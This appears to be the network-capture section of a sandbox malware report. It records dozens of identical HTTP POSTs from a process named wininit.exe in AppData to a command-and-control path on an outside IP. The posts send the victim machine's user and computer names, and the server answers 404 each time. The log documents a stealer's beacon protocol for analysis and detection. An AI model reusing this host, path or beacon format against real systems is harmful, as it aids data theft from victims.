                                                                                                                              Nov 20, 2024 10:57:23.947213888 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:23.952105999 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:24.685511112 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:24 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              13192.168.2.44975494.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:24.846554041 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:24.855712891 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:25.787076950 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:25 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              14192.168.2.44975594.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:25.927906036 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:25.934108973 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:26.822717905 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:26 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              15192.168.2.44975694.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:26.978172064 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:26.983155966 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:27.739604950 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:27 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              16192.168.2.44975794.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:27.885332108 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:27.893409014 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:28.632070065 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:28 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              17192.168.2.44975894.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:28.793894053 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:28.799350023 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:29.544524908 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:29 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              18192.168.2.44975994.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:29.717889071 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:29.726325989 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:30.509517908 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:30 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              19192.168.2.44976094.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:30.662184954 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:30.667112112 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:31.416517019 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:31 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              20192.168.2.44976194.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:31.592397928 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:31.597321033 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:32.379905939 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:32 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              21192.168.2.44976294.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:32.529407024 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:32.534728050 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:33.635812044 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:33 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.
                                                                                                                              Nov 20, 2024 10:57:33.639395952 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:33 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              22192.168.2.44976394.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:33.795550108 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:33.800604105 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:34.562134981 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:34 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              23192.168.2.45848994.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:34.715595007 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:34.722223997 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:35.466188908 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:35 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              24192.168.2.45849194.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:35.625449896 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:35.630460024 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:36.395639896 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:36 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              25192.168.2.45849294.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:36.541212082 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:36.546091080 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:37.284640074 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:37 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              26192.168.2.45849394.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:37.553431988 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:37.558372021 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:38.277973890 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:38 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              27192.168.2.45849594.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:38.437248945 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:38.444139957 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:39.182497978 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:39 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              28192.168.2.45849794.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:39.339431047 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:57:39.350219011 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:57:40.083363056 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:57:39 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              29192.168.2.45849894.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:57:40.383876085 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
